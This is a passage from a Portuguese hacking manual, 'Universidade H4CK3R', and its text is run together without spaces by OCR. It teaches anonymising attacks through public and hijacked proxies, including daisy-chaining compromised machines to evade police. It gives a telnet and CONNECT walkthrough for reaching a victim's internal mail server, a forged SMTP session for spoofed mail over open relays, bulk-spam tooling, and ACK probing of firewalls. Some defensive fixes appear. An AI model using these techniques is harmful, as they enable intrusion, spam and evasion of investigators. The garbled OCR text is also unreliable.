conexão,oIPdeorigemdospacotesquechegamétododoproxy.
SeumhackerconseguiracessoaumproxyqualquerparanavegarnaInternet
seuspassosestarãocobertos.Esseproxypodeserumserviçopúblico-há.
diversosproxiespúblicosnaInternet,algunsgratuitos,masamaioriaépaga.
PodesertambémalgumproxyparticularqueestejamalconfIguradoeaceitan-
dorelaydetodaaInternet.Mesmobemconfigurado,háfalhasemalguns
softwaresquepermitemquehackersusemproxiesalheioscomoescudo.
Ooutroladodamoedatambéméválido.Umproxyéumserviçoabertoem
umaportaTCPe,portanto,estásujeitoafalhas.Umserviçodeproxypodeser
aportadeentradaparaainvasãodamáquinaecomprometimentodeoutros
serviçosantes"saudáveis".
Proxiespúblicos
UmadasformasdenavegarsossegadopelaInternetsemsermolestadoéutilizar-
sedeumservidorpúblicodeproxy.Atrásdesseservidor,seuIPfIcainvisívelpara
todosossitesdaInternet:vocêestáasalvodosvendedoresdeenciclopédias,dos
colecionadoresdecookiesedasinvestigaçõesdogoverno.Hackersqueestejam
tentandoatingi-IoterãoapenasoIPdoproxy.Comotodatecnologiapodetambém
serusadaparaomal,vocêpodeesconder-seatrásdoproxyparaoriginarataques,
queserãoregistradosnoslogsdavítimacomumIPdiferentedoseu.Aconexão
entrevocêeoproxypodesercriptografadacomSSL-normalmentepormeiode
umSecureShellouSSH
-eamaioriadosservidoresgarantequesuasatividades
nãoserãoregistradasousuasinformaçõesredirecionadasaempresasquepatroci-
namoproxy.Pareceseguro,não?Nemtanto.
Bemoumal,opróprioproxyteminformaçõesaseurespeito.Mesmoque
hajaproxiespúblicosgarantindoquevocênãoserárastreadonemregistrado
noslogsdoservidor,algunsdelespodemestarmentindo.Sevocêcausaralgum
estragonaInternet,cedooutardeserárastreadoatéoproxy.Bastaummanda-
dojudicialparaqueoresponsávelpeloservidorabraseusregistrosàPolícia
Federal.Serpresoseriaquestãodehoras.
Háváriasmaneirasdetentardriblaresseinconveniente.Aprimeiraéuma
técnicachamadadaisy-chainproxying:invade-seumcomputadorsemimpor-
tância,queéusadoparainvadirumsegundo,queéusadoparainvadirum
11851
]Vulnerabilidades11

IUniversidadeH4CK3R I
terceiro.Entrecadaumdessescomputadoresusa-seumproxy,aumentandoo
númerodehostsintermediáriosparaseisoumaiseimpondoumadificuldade
extraparaosinvestigadores,queterãodevasculharnosregistrosdevários
proxiesatédeterminaraorigemdecadaumdosestágios.Avantagemdesse
métodoéqueéindependentedeplataforma:vocêpodeusarmáquinasUnix,
Windows,Macouqualqueroutraquepossuaconectividadecompatívelcomo
serviçoproxy.Lembre-sedeusarservidoresdiferentese,preferencialmente,
geograficamel1tedistantes.SevocêestivernoBrasilequerinvadirumsistema
nosEstadosUnidos,seuprimeiroproxypodeestarnaAustrália,osegundono
BrasilmesmoeoterceironaEuropa.IncluiroBrasilnalistadeproxiesutiliza-
doséum"truquesujo"paraconfundiroinvestigador,quenormalmentedescar-
taapossibilidadedeoatacanteestarnomesmopaísdoproxyinvestigado
("Ninguémseriatãoburro...").
.
Algunsendereçosdeproxiespúblicos:
www.publicproxyservers.com/
www.stayinvisible.com/
tools.rosinstrument.com/proxy/
www.antiproxy.com/
netspy.ukrpack.net/
E,obviamente,seubuscadordeInternetfavorito(Google,AlltheWeb),com
aspalavraschave"publicproxy",podecuspircentenasdelistasdeservidores
públicosdisponíveis.Instruçõesparaconfigurarseubrowserparautilizarum
dessesserviçospodemserencontradasnaAjudadosprópriosprogramas.Obser-
vequeháproxiesparaserviçosdeterminados,normalmenteH1TP,Ffpee-mail.
Sevocêpretendeusarumdelesparaumportscanoumesmoumataque,deve
antesdisfarçarospacotesTCP/lPdeseuataqueparaquesepareçamcomo
serviçosuportadoesepassempeloproxy.
OutramaneiradereforçaroanonimatonaGrandeRede,maissimples,mas
menosefetiva,éusarprogramasqueescolhemautomaticamenteoproxyde
umalistaeconectam-seaeles.Cadavezqueoprogramaéativado,umservidor
éescolhidoaleatoriamenteouobedecendoacritériospredefinidos.Algunsmais
avançadossãocapazesdealternarentreproxiesdetemposemtempos,pulve-
rizandoosrastros.Obrowserdeveserconfiguradoparaacessaroprograma,
querodanoendereçodeloopback("localhost"ou127.0.0.1),edeixarqueo
programacuidedeencontrarumproxyseguro.
Umbomserviçopagodeproxyassistidoporumprograma-clienteéo
Anonymizer(www.anonymizer.com).Aversãomaisbásicadoserviçocustava,
emmarçode2003,US$49,90maisimpostos,eestavadisponívelapenaspara
Windows.Entreosrecursosoferecidos,alémdoproxyaleatóriocomservi-
dorespúblicos,estãoacriptografiadeURLs,gerenciamentodecookies,
1186I
Vulnerabilidades11[

Universidade2°Ano
bloqueiodowebbug,apaga-
mentoautomáticodohistóri-
codepáginasvisitadaseuma
barradeferramentasparao
InternetExplorer6.
Alémdele,podemosdestacar
oAnonymity4Proxy(www.
inetprivacy.com/a4proxy/).
Disponívelparatodasasver-
sõesdoWindows,possuiuma
listamuitograndedeproxies
públicos,efazogeren-
ciamentodeconexõesatodos
eles.Possuidiversasopções
quepermitemassociarzonasdaInternetousitesespecíficosaumoumais
servidoresdeproxy,análisedotráfegoeprotocolosassociadose
compartilhamentodaconexãocomumaredelocal.
OutrodignodenotaéoStealther,umsoftwarequeofereceapossibilidade
deutilizarumamatrizdeproxiespúblicosparaautomatizarodaisy-chain.
OStealtherpodeserencontradoem(www.photonosoftware.com/Stealther/
main.php::;?language=eng&reseller=9824).
ParaaturmadoFreeSoftwareexisteoJAP-JavaAnonymityandPrivacy.
ComoéescritoemJava,funcionanasmaisdiversasplataformasquesuportam
essalinguagem,incluindoUnix,Macintosh,OS/2eWindows.Osoftwarepode
serbaixadoemanon.inf.tu-dresden.de/(ositeestáemalemão).
11871
]VulnerabilidadesII

IUniversidadeH4CK3R I
~
opessoaldoUnixnãofoiesquecido.O
ProxyTools(proxytools.sourceforge.net)é
umconjuntodeferramentasparadesktop
eservidorquetambémpermitenavegar
anonimamentenaInternetusandoproxies
anônimos.Elefoiespecialmentedesenvol-
vidoparaauxiliarosinternautasdepaíses
queaplicamacensuranaInternet,como
China,Burmaeospaísesislâmicos(e,mais
recentemente,osEstadosUnidosdaAméri-
ca).Asferramentasparamáquinas-cliente
rodamexatamentedamaneiraqueos.ou-
trossoftwareslistadosacima:procurame
encontramservidoresproxypúblicos.Há
aindaumdaemonquepoderodaremumservidorUnixedesempenhaaÍlm-
çãode"proxydosproxies".Dessaforma,oclientenãoprecisaternadainstala-
doemseucomputador,fugindodebatidaspoliciaise,principalmente,das
duríssimaspenasaplicadasaosinfratoresdasleisdecensura.Emalgunspaí-
ses,essaspenaspodemincluiraexecuçãodoinfrator.
OutrasferramentassimilaresparaUnixsãooBouncer(www.rOOt3d.org.uk)
eoProxyFloppy(www.nameless.cultists.org).
Apesardesermaisseguroquenavegardepeitoaberto,cuidadocomos
proxies,especialmenteospúblicos!Algunssãoarmadilhasdapolícia,outros
sãopornaturezainsegurosepodehaver,inclusive,servidoresmaliciosos,man-
tidosporcrackers,pararastrearscriptkiddieseinternautasincautos,visando
ausá-Ios(principalmenteseusIPs)comolaranjasemataquesdespoofing.Por
issomesmo,hackersexperientesprefereminvadirumaredesemimportância
(pequenasempresas,escolasouuniversidades)parausarseuproxy.Ouvaler-
sedeproxiesmalconfiguradosàsoltapelaInternet.
Proxiesprivados
Hádiversasmaneirasdeinvadirumamáquinarodandoalgumprogramadeproxy
efazê-Iaesconder-sedaInternet.Ométodoparacadatipodeproxydependede
suaversãoedosistemaoperacionalnoqualroda.Masháalgumasvulnerabilidades
quefimcionamemqualquerplataforma,poissãoinerentesàtecnologiaenãoà
implementaçãodatecnologiaporumdeterminadodesenvolvedor.
UmdessescasoséoTCPTunnel,umamaneiradeencapsularpacotesTCP
dentrodeoutrosparatransportá-IosasalvopelaInternet.Essatecnologiaé
muitousadaparacriarVPNs,ouredesprivadasvirtuais.Masumafalhana
tecnologiapodedarahackersespertosumproxyimprovisado.Essa
vulnerabilidadeérealmenteantiga.VejaoquedizoFAQdosoftwareSquid
(www.squid-cache.orglDoc/FAQ/FAQ-1.html).noitem1.12:
1188I
VulnerabilidadesII[

Universidade2°Ano
"Desdeaversão2.5,oSquidsuportaconexõesSSLetráfego"tunelado"entre
clienteseservidores.Nestecaso,oSquidpodefazerumrelaydosbits
criptografadosentreasduasextremidadesdaconexão.
Normalmente,quandoseubrowserencontraumaURLhttps,executauma
dasduasaçõesabaixo:
1ObrowserabreumaconexãoSSLdiretacomoservidorhttps;
2ObrowsersolicitaaaberturadeumtúnelIPatravésdoSquidusandoo
métodoCONNECT.
OmétodoCONNECTéumaformadetunelarqualquerconexãoquepasse
porumproxydeHTTP.Oproxynãointerpretaouentendeoconteúdoque
estásendotunelado,apenasorepassaentreasduasmáquinasenvolvidasna
conexão.ParamaisdetalhessobretunelamentoeométodoCONNECT,vejao
.
internetdraft"TunnelingTCPbasedprotocolsthroughwebproxyservers"
(www:web-cache.com/Writings/lnternet-Drafts/draft-luotonen-web-proxy-
tunneling-O1.txt)eaRFC2817(ftp://ftp.isLedu/in-notes/rfc2817.txt)."
Vejaaseguintefrase,retiradadessetrechodoFAQ:"Oproxynãointerpretaou
entendeoconteúdoqueestásendotunelado,apenasorepassaentreasduas
máquinasenvolvidasnaconexão."Issoquerdizerqueoproxysequerverificase
osdadosestãocriptografadosounão.Portanto,pode-seexploraressa
vulnerabilidadesimplesmenteusandoométodoCONNECTparaconectar-sea
umservidor,quepodesertantoumamáquinanaInternetcomoumservidorem
suaIntranet!Lembre-sedequeoproxypodeestarrodandonamáquinagateway,
quepossuiduasinterfacesderede(umaparaaredeinternaeoutraparaarede
externa).Tomandopossedoproxy,oinvasortemacessoàredeinterna,mesmo
queelasejaimplementadacomIPsreservadoscomo10.0.0.0.ou192.168.0.0!!!
Quetalumexemploprático?Emumproxyvulnerável,nosconectaremosa
umservidordee-mailinternoeousaremoscomoremailer.Considereasse-
guintesinformações:
~IPdoatacante:200.230.xxx.yyy
~Proxyvulneráveldavítima:64.131.aaa.bbb,"escutando"naporta3128
~ServidorSMTPinternodavítima:192.168.1.11
Conecte-seaoproxyusandoovelhoebomtelnet(oexemplousaoshelldo
Unix,maspodeserfeitonoWindowssemproblemas,comemuladoresdeter-
minaletelnetcomooTeraTermoumesmooHyperTerminal,quevem"debrin-
de"comoSO):
$telnet64.131.aaa.bbb3128
Umavezconectado,digiteoseguintecomando:
CONNECT192.168.1.11:25/HTTP/1.0
Se,comoresposta,aparecerobannerdoservidor,vocêpodeemitircoman-
dosparaenviarseuse-mailsanônimos(vejaapróximaseção,"Anonymous
remailers",aindanestecapítulo).NotequeSMTPfoiusadoaquiapenascomo
exemplo.VocêpodeusarométodoCONNECTparaqualquerserviço:POp,FTP,
1189I
IVulnerabilidades11

IUniversidadeH4CK3R I
HTTP,5MB/CIFS,Telnetnovamente...Noteaindaque,tunelandováriosproxies
emcadeia,épossívelcolocarváriosníveisdeproxyingemseusataques.
Acorreçãoparaesteproblemaétãosimplesquantoóbvia:desligueoTCP
Thnnelingnoseuproxy.Seotunelamentoforabsolutamentenecessário,nãodeixe
seuproxyconectadodiretamenteàInternet.Instale-oemoutramáquinaecoloque-
oatrásdofirewall.Restringirasportaspelasquaissepodefazerotunelamento,
deixandoapenasasquerealmenteserãousadas,tambéméumaboasaída.
Squid
OSquid,proxyservernúmeroumparaamantesdoUnixedoSoftwareLivre,
tambémtemsuasmazelas.SitescomSquideregrasdeflrewallsmalconflgura-
dossãoumpratocheioparaquemestáprocurandoanonimato.Masmesmo
sistemasperfeitamenteconflgurados(eindiscutivelmentesegurosdopontode
vistadoadministrador)podemestarfrágeisaataques.Umavulnerabilidade
recente(lwn.netNulnerabilities/4;;;;;;6)permitediversosataques,entreeles:
~ProblemascomoprotocoloGopherpermitemquemenusmalformados
causemproblemasdesegurança;
~OsdoiscanaisdecomunicaçãoFTPpermitemquedadossejamextraídos
ouinseridos,podendoforçarodownloaddearquivosarbitráriosouaexecu-
çãodecomandosnoservidor;
~Falhanaautenticaçãopermitequeusuáriosnãocadastradosutilizemoproxy.
Astrêsfalhaspoderiamserusadaspara,alémdainvasãodoservidornoqual
oSquidestivesserodando,forçaroproxyafazerrelaydeIPsnãoautorizados.
ExploitspodemserencontradosnoSecurityFocus(www.securityfocus.com).
Acorreçãoésimples:atualizeseuSquidparaaversão2.4.STABLE7ousuperi-
or.Mascomoosadministradoresderedeporaísãopreguiçosos(eafalhaé
relativamentenova,denovembrode2002),épossívelquevocêencontre,por
muitosanosainda,Squidscomversõesvulneráveis.
WinGate
OWinGatefoilançadoem1995comoumcompartilhadordeInternetpara
redesdomésticas.Simulaumproxy/gatewayporIPMasqueradee,peloseu
preçobaixo,foimuitopopularnosEUA.Apesardeserumprodutojávelhinho,
muitagenteaindaousaparacompartilharsuaconexãodeInternetcomas
máquinasdeumapequenarede.Hádiversasmaneirasdetiraralgumasversões
antigasdoWinGatedoar.Umadasmaisconhecidaséconectar-se(comtelnet,
porexemplo)àporta2080eenviaralgunsquilobytesdedadosquaisquer.
MasointeressanteéquealgumasversõesdoWinGatemalconflguradasper-
mitemqueelesejausadocomoproxyanônimo.Sevocêrodaumdesses,está
arriscadoaemprestaroSEUIPparaquescriptkiddiesataquemoPentágono.
EncontrarexploitsparaoWinGateémuitofácil.Useseumecanismodebusca
190 I
Vulnerabilidades11[

Universidade2°Ano
favoritoeprocurepor"wingatescanner".Tenhaemmentequemuitosdesses
scannerspodemserarmadilhasparapegarscriptkiddiese,portanto,conter
vírusetrojans-atualizeseuantivírus!!!
Acorreçãoparaissoébemfácil.SevocêinsistiremusarWindows,façaum
upgradedoWinGate(www.wingate.com)ouuseoutrosoftware,comoo
WinProxy(www.winproxy.com).AsversõesmaisnovasdoWindowspossuem
oInternetConnectionSharing,quedispensaousodeprogramasexternos.Mas
opróprioICSé,emsi,inseguro,entãorecomendamosqueinstaleumftrewall
pessoalcomooZoneAlarm(www.zonealarm.com)oucompreporunstroca-
dosumasucatade386(funcionando,obviamente)compelomenos8Mbytes
deRAMesemnenhumHD.Nela,instalealgumgateway+ftrewallbaseadoem
LinuxouFreeBSD.BoaspedidassãooCoyoteLinux(www.coyotelinux.com).o
Trinux(trinux.sourceforge.net)eoFreeSCO(www.freesco.org).Asucatade
386custarámaisbaratoqueaslicençasdeWinGate,WinProxyoudoWindows
comICSeZoneAlarm.Alémdisso,sebemconflguradafuncionarámelhor,será
maisseguraedeixaráseumierodetrabalhocommenosporcariasinstaladas.
AnonymousremaiLers
Umadascoisasmaischatasqueexistem(depoisdosvendedoresdeenciclo-
pédia,dospop-upsemwebsitesedosrepresentantestécnicosdegrandes
softwarehouses,insistindoparaquevocêuseocaríssimoprogramadeles,e
nãoaquelegratuitoquefazamesmacoisa)éospam.Todosnósrecebemos,
diariamente,dezenasoumesmocentenasdemensagensindesejadasnosofere-
cendodetudo,desexoaceracoloridaparaautomóveis,depanelasultra-mo-
dernasaconsolidaçãodedívidas.Emumprimeiromomento,éfácilconflgurar
umclientedee-mailcomooOutlookouoEudorapara,nocampo"From"das
mensagensenviadas,apresentarumendereçodiferente.doseu.
Masesseartifícioélogodescoberto,poisnocabeçalhodoe-mail(osdados
quevêmantesdesuamensagem,equenormalmentenãoaparecem)ficam
registradosseue-mailverdadeiro,oendereçodeseuservidorSMTPeatéo
nomedoprogramaquevocêusou.Paraenviarspamsossegado(ouumcavalo
detróia)vocêtem,então,duasopções:
~EncontrarservidoresdeSMTPqueestejamabertospararelayexterno,ou
seja,queaceitemconexõesvindasdequalquercantodaInternet.Acredite,eles
sãobemcomuns...
~Utilizarumsoftwareousitequereenvieseuse-mailssemrevelaraorigem.
EmservidoresSMTPdesprotegidos,vocêpodeconfigurarseuclientede
e-mailparaconectar-seaele,masissopoderiadeixarmuitosrastros.Umaboa
técnicaéusarovelhoebomtelnetparatal.Depoisdeencontrarumservidor
dee-mailabertoaograndepúblico,dêumtelnetaelenaporta
25:
$telnetIP.DO.SMTP.ABERTO 25
1191 1
IVulnerabilidadesII

IUniversidadeH4CK3R I
Nopromptqueaparecer,vocêdevedigitaroscomandosque,normalmente,
seuprogramadee-mailenviariaaoservidor-sim,elesestãoemtextopuro!
HELOservidor.aberto.com
MAILFROM:[email protected]
RCPT
TO:[email protected]
DATA
Date:Thu,31Dec1998
12:16:35-0500(EST)
From:[email protected] (Umbrasileiroresoluto)
To:[email protected]
Subject:ProgramadeGoverno
Reply-To:[email protected]
Ei!Quandovocêsvãocomeçaracumpriroprogramade
governo,hein?
QUIT
Algunssistemas,mesmoabertospararelayexterno,sãoimunesaesseprocedi-
mento.Vocêconseguiráenviaroe-mail,masnãoserápermitido"mentir"arespeito
deseuendereço.Enviarume-mailavocêmesmoéumbomteste,masnãoesqueça
deverificaroscabeçalhos!OqueocorreéqueservidoresdeSMTPmaisnovos
verificarãosuaidentidadecomoserviçoidentd(quetentaidentificá-Ioremotamen-
te).Nessescasos,énecessário"enganar"oidentdprimeiro,paradepoisusaro
SMTPaberto.Nãotenhapreguiçadecompletartodososcamposmostrados.As-
sim,suamensagemficarámaisparecidacomumamensagemreal.Paramaisinfor-
maçõessobreofuncionamentodoprotocoloSMTP,leiaasRFCs822e931.
Hádiversossitesqueenviame-mailsanônimos.Mesmograndessitesdehospe-
dagemgratuitaemecanismosdebusca(comooLycos:members.lycos.fr/
moiaptoi/mail.php)possuempáginasespeciaisparaenviare-mailscommensa-
gensoue-cardsaosseusamigos-ferramentaque,namãodeumhacker,torna-se
umaarma.UmarápidapesquisanoGoogleretomouváriosexemplosdeweb
anonymousmailers.Separamos,dentreascentenasmostradas,estescinco:
~www.gi1c.org/speech/anonymous/remai1er.html
~fanc1ub.etoy.c3.hu/tanksystem/underground-tank/resistance/
mailerform.html
~judsonalumni.com/1evel5
~www.email-anonyme.fr.st
~mailer.us.tf
VocêpodeaindainvadirumservidorqualquernaInterneteimp1ementar
lá,semqueninguémsaiba,seupróprioMailer.Umexemplodecódigo(em
PHP)podeservistoemhttp://www.pscode.com/vb/scripts/
ShowCode.asp?txtCodeId=953&lngWId=8.
Hápilhasdesoftwaresqueautomatizamoprocessodeenviartoneladasdee-
mailsparamilharesdeendereços,incluindoaíimp1ementarseupróprioservi-
dorSMTPdomésticoouvarreraInternetatrásdeservidorespodres.Sevocê
<=Umsitedeestudantes!
1192I
Vulnerabilidades11[

Universidade2°Ano
usaUnixetemconexãodiretacomaInternet,podeinstalarumservidorcom-
pletodeSMTPemsuamáquina,configurá-Ioparaumdomíniofictícioqualquer
emandarbrasa!AlgunsprovedoresbloqueiamservidoresSMTPemseusassi-
nantes,masnadaqueumproxypúbliconãoresolva...
Hádiversasopçõesdisponíveis,sendooQmail,PostflXeoveteranoSendmail
asmaisconhecidas.Emumrefmamentodesseprocesso,podem-seutilizarser-
vidoresdelistasdediscussãoparaautomatizaraentregaamuitosdestinatári-
os.Entreosservidoresdelistasmaiscomunsencontram-seoMajordomo,o
EximeoGNUMailman.Paraalimentarosservidoresdelistas,bastacriaruma
listadedistribuiçãoecadastrar,aospoucos,endereçoscolecionadospelaInternet.
HáscriptscomooBulkMailer(ftp://cs.utk.edu/pub/moorelbulkmailer/)que
facilitamatarefaaindamais.UmaprocuranoGooglejáseriasuficientepara
começar,masnãohánecessidade:vocêpode,simplesmente,copiarecolara
partirdaquelese-mailsdecorrenteemensagensdefimdeanoquesecostuma
receberequenormalmentevêmrepletosdeendereçosnoscampos"Para"e
"CC".Sevocêéinimigodospam,umadica:aoreenviarmensagens,usesempre
ocampo"CópiaOculta"ouBCC.
Noladodocliente,aindaépossívelenviare-mailsanônimosseminvadirser-
vidoralgum.Tenhaemmenteque,apesardeserumasoluçãomaissimples,é
perigosamentefácildeserrastreada.Algunsprogramas(pagos)paraWindows
quefazemissosão:
~Send-Safe:www.send-safe.com
~Bulker:bulker.us
NoCD,háalgunsoutrosprogramasgratuitosqueprometemcumpriropro-
metido:enviare-mailsanônimosaumgrandenúmerodepessoas.Testetodos.
Masnãoseprendaàfacilidadedeumscript,comodiriaahackergirlMelpôneme.
TenteentendercomoosservidoresSMTPfuncionam,everáqueéfácilutilizar
qualquerumdelesparaenviare-mailsanônimos.Umaúltimarecomendação:
leiaasRFCs!
Furandofirewalls
Quandoalguéminvadeumcomputadordoméstico,temàsuadisposiçãoal-
gunsarquivosimportantesapenasparaodono.Talvezalgumsoftwarebacana
quemereçasercopiado.Essasmáquinasnãoservempararealizarosonho
warholianodessesadolescentes:terseusbrevesmomentosdefama.
Paraconseguiratãosonhadapublicidadegrátis,énecessárioatacarsistemas
quesejamvisíveisaograndepúblico.Alterarwebsiteséaprimeiríssimaesco-
lha,umavezquealgumrecadopodeserdadoeaobra-de-artesemprevirá
assinada.Masháoutrasopçõesdegranderepercussão,emboramaisanônimas.
DerrubarservidoresdeempresasouroteadoresdaInternetsãoduasdelas.
Apesardoanonimato,oestragocausadoégrande.
1193I
]VulnerabilidadesII

IUniversidadeH4CK3R I
Firewalls
Falemosaverdade:quemhoje,emsãconsciência,deixariaumservidorWeb
ligadodiretamenteàInternet?(Ok,ok,ok,estábem:muitagentefariaisso...?)
Mesmoquesejammáquinasacessíveisaosinternautasemgeral,umcertograu
deproteçãodeveserprovidenciadoparaquenossositenãosejamolestado
logonoprimeirodia(ouantes,naprimeirahora...).Essaproteçãousualmente
érelegadaaequipamentoschamadosfn-ewa1ls.
Umfirewallsempreécolocadonadivisaentreduasoumaisredes.Podeser
entreredesprivadasouentreumaredeprivadaeaInternet.Afunçãodetal
equipamentoécontrolarotráfegoentreelas,permitindooubloqueandoinfor-
maçõesdeacordocomregraspreestabelecidas.Hádiversasexplicaçõespara
apalavrafirewall.Osautorespreferemadefiniçãode"portacorta-fogo",ou
seja,deixapassaraspessoascorrendodoincêndiomasbloqueiaofogo.
Analogamente,osfirewallsagemcomoportasquepermitemaalgumascone-
xõesentrarousairdarede,enquantobloqueiaasdemais.Normalmente,as
conexõesoriginadasdedentrodaredesãopermitidas,enquantoasoriginadas
deforadaredesãobloqueadas.
Permite~ídaeretorno
Hátrêstiposbásicosdefirewall.Osdoismaistradicionaissãoosfiltrosde
pacoteseosproxies.Oterceirotipoéumaevoluçãodofiltrodepacotestradi-
cionalchamadodefiltrodeestadosdepacotesoustatefulpacketfilter(SPF).
Filtrosdepacotes
Atentativamaisantigadebarraracessosindesejadosemnossasredestalvez
sejaadeanalisarospacotesTCP/lPumporume,olhandoemseuscabeçalhos,
decidir(ouadivinhar)seomesmoémalignoounão.Normalmente,as"pergun-
tas"queof11trofazaopacotesão:
~OpacoteédestinadoaoendereçoIPdealgumservidordarede?
~SeuendereçoIPdeorigemépermitidonestarede?
~AportaTCP/UDPaquesedestinacorrespondeaumserviçoofertadona
minharede?
~AportaTCP/UDPdeorigemcorrespondeaumaaplicação-clientedosmeus
serviços?
11941
Vulnerabilidades111

Universidade2°Ano
~Osbitsdopacote(SYNouACK)sãopartedohandshakeTCP?
~OpacoteIPestásaindoouentrandodarede?
Searespostaparaascincoprimeirasperguntasfor"sim",oftrewallpermite
queopacoteentreousaia.Aconftguraçãodecadaumadassituaçõesdeper-
missãooubloqueiodepacoteséchamadaderegra.Umconjuntoqualquer
dessasregraséchamadodeaccesscontrollist(ACL).Háváriossoftwaresdife-
rentesqueimplementamf1ltrosdepacotes.Algunssãoinstaladosemhardwares
específtcoscomoroteadoreseoschamados"firewallsderack".Outrossão
programasquerodamemcomputadorescomuns.Algunspossueminterfaces
gráficasparaconftguração,outrosdevemserajustadoscomlinhasdecoman-
doporvezescomplexas.Comoasintaxeeomododeconftguraçãovariam
muito,nãoépossívelapresentarumexemplorealderegradeftrewall.Entre-
tanto,comotecnicamenteaf1ltrageméidêntica,variandoapenasasintaxedo
comando,umatabeladeregraspoderia,parafmsdidáticos,serescritaassim:
Nesteexemplo,nossoadministradorderedesquisliberaroacessoàWorld
WideWebparaosusuáriosdessarede.Normalmente,osservidoresWebrodam
naportaTCP80(lembre-se:RFC1700).Segundoaprimeiraregra,todasascone-
xõesdedentroparaforacujodestinosejaaporta80sãopermitidas.Obviamen-
te,obrowserdousuárioenviaumpacoteTCPSYNparaaporta80doservidor
Webeesperaumaresposta.TalrespostavemsobaformadeumpacoteACK,
cujaportadeorigeméaTCP80doservidorcomdestinoaumaportaqualquer
maiorque1.024nocomputadordousuário.Asegundaregrapermiteisso.
Aterceiraregrapermitequequalquerrequisiçãodeconexão(ouseja,um
pacoteTCPSYN)sejapassadaaoendereçodoservidorWeb,eapenasaele,na
porta80.Umarequisiçãoàporta80deoutramáquinaqualquerserábloquea-
da.ArespostadonossoservidorWebpassapeloftrewall,permitidapelaregra
quatro.Porftm,aregracincobloqueiatodasasoutrasconexões.
Masof1ltrodepacoteséignorante.AlémdoqueestádefIDidoemsuasregras,ele
nãosabedemaisnada.Observearegradois.QualquerpacoteTCPvindodefora,
cujaorigemsejaaporta80eoflagACKestejaligado,seriaaceitopeloftrewallsem
reclamar.Ora,umhackerpoderiaenviarumpacoteACKquenãofossepartedeum
hadshakeTCP.Comessepacote,todososendereçosIPdaredepoderiamsertesta-
dosparaverificarsuaexistência.Issoéumbelofurodesegurança!
11951
IVulnerabilidadesII
IPOrigem IPDestinoPortaOrigem PortaDestinoProtocoloFlagTCP Ação
RedeInternaRedeExternaTodas 80 TCP Todos Permitir
RedeExternaRedeExterna80 Todas TCP ACK Permitir
RedeExternaServidorWebTodas 80 TCP SYN Permitir
ServidorWebRedeExterna80 Todas TCP ACK Permitir
Todas Todas Todas Todas Todos Todos Negar

IUniversidadeH4CK3R I
OutroproblemasãoospacotesUDP.Elesnãopossuemosflagsdecontrole,
apenasIP/portadeorigemedestino.Oadministradortemapenasduasopções:
bloqueá-Iosoupermiti-Ios.ServiçosimportantescomooDNS(porta53)utili-
zamportasUDPe,portanto,devemserliberadosnoflrewall.Aomesmotempo,
amesmaportaUDP53podeserusadaparatransmissãodedadosparaohacker
apartirdeumcavalodetróia.Of1ltrodepacotesnãotemcomodiferenciar
entreaconexãoválidaeamaliciosa.
Proxies
Osf1ltrosdepacotes,comoonomejádiz,baseiam-senasinformaçõescarre-
gadaspelosprópriospacotesparatomarasdecisõessobrequementraousai
equemébarrado.Diferentemente,flrewallsbaseadosnatecnologiaproxytra-
balhamcomacamadadeaplicação.Oproxyinteragecomoprogramaeseus
protocolos,independentedecomoesseprotocoloseráencapsuladonapilha
TCP/lP.Porexemplo,umproxyparaWebmuitoconhecidonomundoUnix,o
Squid,trabalhaapenascomoprotocoloHTTp,bloqueandoosdemais2.Além
disso,éimuneaataquescompacotesisolados.OpacoteACKquepassoucom
galhardiapelof1ltrodepacotesserásolenementeignoradopeloproxy,que
aindavai"escovarosbits"doprotocoloHTTPparadeixarpassarapenasmen-
sagensquelheobedeçamestritamente-açãomuitomaisefetivadoquesim-
plesmentebloquearasconexõesACKTCP/80.Háproxiesparatodososgostos,
sendoHTTp,FTPeTelnetosmaiscomuns.
Proxyrepassa
solicitaçãoaoservidor
.Proxy
Opcionalmente,umproxypodeautenticarusuários,permitindoqueapenas
loginsdevidamentecadastradosoutilizem.Seéútilparacontrolarquempode
ounãoacessarserviçosexternos-umcontroleassazválidoemempresas-é
muitomaisútilparaimpedirquecavalosdetróiaconectem-secomseusamos
malignosenvoltosnasbrumasdaInternet.Defato,emumf1ltrodepacotesque
permitaconexãopelaportaTCP80,alémderequisiçõesHTTPválidas,poderí-
amostertrojansconectando-sepelamesmaporta.Comumproxyissonão
seriapossível.MesmoqueotrojandisfarceseusdadoscomumcabeçalhoHTTP
válido,aconexãonãopassariapeloesquemadeautenticação.
2.Normalmente,eleéconfiguradoparaservirapenascomooproxyweb.
1196 1
VulnerabilidadesII[

Universidade2°Ano
Filtrosdepacotesporestado(SPF)
Quetaldotar dealgumainteligênciaosmicrocefálicosilltrosdepacotes?Uma
novatecnologiadeanálisedepacotesfoiagregadaaosilltros,permitindoqueeles
lembrem-sedepacotesanterioresantesdepermitiroutromaisrecenteentrar.Essa
"memória"éimplementadanaformadeumatabeladeconexõesativas.Quando
umaconexãoéiniciada,todososdadosdopacotesãoguardadosnela.Seumnovo
pacotechegaremdireçãoàmesmamáquina,oSPFconsultaatabela.Onovopaco-
teéaceitocasosejadadaacontinuaçãodaconexãoourejeitado,senãofor.
UmexemplopráticoéoprópriohadshakebásicodoTCP.Umamáquinade
dentrodaredeenviaumpacoteTCPSYN,quepassapeloSPFeéregistradona
tabela.EssamáquinaesperaporumpacoteTCPSYN/ACKdaoutramáquina
(externa)queparticipadaconexão.Quandoopacotechega,oSPFanalisaa
tabelae,verificandoqueéumpacoteválido,permitesuapassagem.Ofirewall
sabequesópodeaceitaropacoteSYN/ACKseeleforumarespostaaumSYN
vindodedentrodarede.Comisso,aqueleblack-hatespertoqueusouumpaco-
teACKsolitárionãoconseguirá,destavez,bisbilhotarnossarede.
Pesquisandoasregrasdofiltrodepacotes
UmscriptkiddienormalmentedesistedeescaneararedeseseuspacotesACK
nãopassarempeloflfewall.Hámaneirasdefurarqualquerumdostrêstiposde
flfewalls,equeserãoestudadascomoutrosdetalhesmaisadiantenolivro.
Porora,vamosnospreocuparcomafracaoposiçãooferecidapelosilltrosde
pacotes.Tristemente,vemosqueamaioriaesmagadoradasredesconectadasà
Internetpossuiapenasessesilltrosinstalados.Osproxiessãocomumente usa-
doscomocachesparaaumentaraperformancedasconexõeseraramentede-
sempenham umpapeldefirewall.SPFssãoaindamaisnegligenciados:amaioria
dos"administradores"deredeporaísequersabeoquesãoStatefulPacketFilters.
Épossíveldeterminar,pormeiodepacotesACK,quaisportasumf1ltrode
pacotesdeixouabertas.Comovimos,osfiltrosdepacotesdeixarãoentrarqual-
querpacotecomoflagACKligado,pensandoquesãorespostasarequisições
